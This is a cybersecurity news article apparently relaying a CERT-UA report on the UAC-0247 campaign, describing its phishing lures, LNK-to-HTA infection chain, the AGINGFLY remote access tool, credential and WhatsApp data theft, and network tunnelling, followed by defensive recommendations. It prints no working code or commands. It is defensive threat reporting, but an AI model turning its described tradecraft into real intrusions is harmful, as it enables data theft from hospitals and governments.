The attackers are not only stealing sensitive data from internet browsers and WhatsApp but are also moving quietly through compromised networks to expand their reach.
The campaign begins with a simple but deceptive email. The attacker reaches out to the target under the cover of a humanitarian aid discussion, asking the recipient to click on a link.
To make the email look convincing, the attacker either builds a fake website using artificial intelligence tools or redirects the victim to a legitimate third-party site that carries a Cross-Site Scripting (XSS) vulnerability. Once the victim clicks the link, an archive file downloads to their computer.
Opening the archive triggers a shortcut file that activates the standard HTA file processing tool, which then pulls and runs a remote HTA file. This decoy form keeps the victim distracted while a background process drops and launches an executable file through a scheduled task.
CERT-UA analysts identified and documented this activity as part of an intensified wave of cyberattacks recorded during March and April 2026, noting that the same cluster has also targeted representatives of Ukraine’s Defense Forces and FPV drone operators.
In one confirmed case from March 10, 2026, an archive named “bachu.zip” was distributed through the Signal messenger, posing as an updated version of the “BACHU” software tool used by FPV operators.
Inside, the archive carried a DLL file that launched the AGINGFLY malware through a DLL side-loading technique the moment the main executable ran.
Among all the tools deployed in this campaign, the study of a dozen cyber incidents revealed a consistent pattern of data theft and network reconnaissance.
Attackers used CHROMELEVATOR to pull authentication data and other stored credentials from internet browsers, while a separate tool called ZAPIXDESK was used specifically to steal data from the WhatsApp messenger application.
Alongside the theft tools, the attackers used basic subnet scanners and the publicly available RUSTSCAN tool to map out internal networks.
In some cases, the LIGOLO-NG and CHISEL tools were deployed to build hidden network tunnels, and one incident even revealed the use of the XMRIG miner, packaged as a DLL and loaded through a patched version of the legitimate WIREGUARD program.
The core remote access tool used across this campaign is AGINGFLY, written in the C# programming language. It provides the attacker with a full set of remote control capabilities, including command execution, file downloading, screenshot capture, keylogger activation, and in-memory code execution.
What makes AGINGFLY stand out from similar tools is that its command handlers are not built into the malware itself.
Instead, they are downloaded from the command-and-control (C2) server as source code and compiled on the fly inside the infected system.
Communication with the C2 server runs through web sockets, and all traffic is encrypted using the AES-CBC algorithm with a static key.
To maintain a persistent foothold, the campaign also uses a PowerShell script named SILENTLOOP, which automatically runs commands, updates its configuration, and retrieves the latest C2 server IP address from a Telegram channel.
If the primary Telegram source fails, SILENTLOOP also supports backup mechanisms to find the C2 address.
The initial access stage uses either a TCP reverse shell or RAVENSHELL, which establishes an encrypted TCP connection using a 9-byte XOR key and communicates with the management server through CMD.
CERT-UA recommends that organizations reduce their exposure by restricting the execution of LNK, HTA, and JS files on endpoint systems. Administrators should also limit the use of legitimate utilities such as mshta.exe, powershell.exe, and wscript.exe, which this campaign actively abuses.
These restrictions align with standard attack surface reduction practices built into the operating system and do not require third-party tools to implement.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post New UAC-0247 Campaign Steals Browser and WhatsApp Data From Hospitals and Governments appeared first on Cyber Security News.
Numerous research on flexible working suggest it has become a staple of modern employment strategy.…
Kyckr, the global business Register has announced the appointment of Ian Jones as its new…
Sparq has announced the launch of The Shop. A dedicated practice within Sparq designed to…
Certinia has announced the launch of Veda, a new AI-powered intelligent operations engine designed to…
As enterprises increase their adoption of AI, trust is changing. Contracts – the very foundation…
James Bond video game 007: First Light will feature a main title theme sung by…
This website uses cookies.